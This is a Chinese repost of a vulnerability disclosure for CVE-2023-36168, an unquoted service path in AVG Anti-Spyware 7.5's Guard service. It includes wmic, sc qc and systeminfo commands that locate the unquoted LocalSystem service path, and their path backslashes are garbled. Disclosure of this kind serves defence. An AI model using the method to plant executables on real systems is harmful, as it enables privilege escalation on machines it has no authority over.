AVG AVG Anti-Spyware v.7.5 中的一个问题允许攻击者通过精心设计的脚本对 Guard.exe 组件执行任意代码
漏洞标题:AVG Anti Spyware 7.5 - 不带引号的服务路径
日期:2023年6月7日
漏洞作者:Idan Malihi
供应商主页:https: //www.avg.com
软件链接:https: //www.avg.com/en-ww/homepage#pc
版本:7.5
测试环境:Microsoft Windows 10 Pro
CVE:CVE-2023-36168
#PoC
C:Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:Windows" | findstr /i /v """ AVG Anti-Spyware Guard AVG Anti-Spyware Guard C:Program Files (x86)GrisoftAVG Anti-Spyware 7.5guard.exe Auto
C:Users>sc qc "AVG Anti-Spyware Guard" [SC] QueryServiceConfig SUCCESS
SERVICE_NAME: AVG Anti-Spyware Guard TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:Program Files (x86)GrisoftAVG Anti-Spyware 7.5guard.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : AVG Anti-Spyware Guard DEPENDENCIES : SERVICE_START_NAME : LocalSystem
C:Users>systeminfo
Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
原文始发于微信公众号(Ots安全):CVE-2023-36168-AVG Anti-Spyware v.7.5 允许通过脚本对 Guard.exe 组件执行任意代码
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论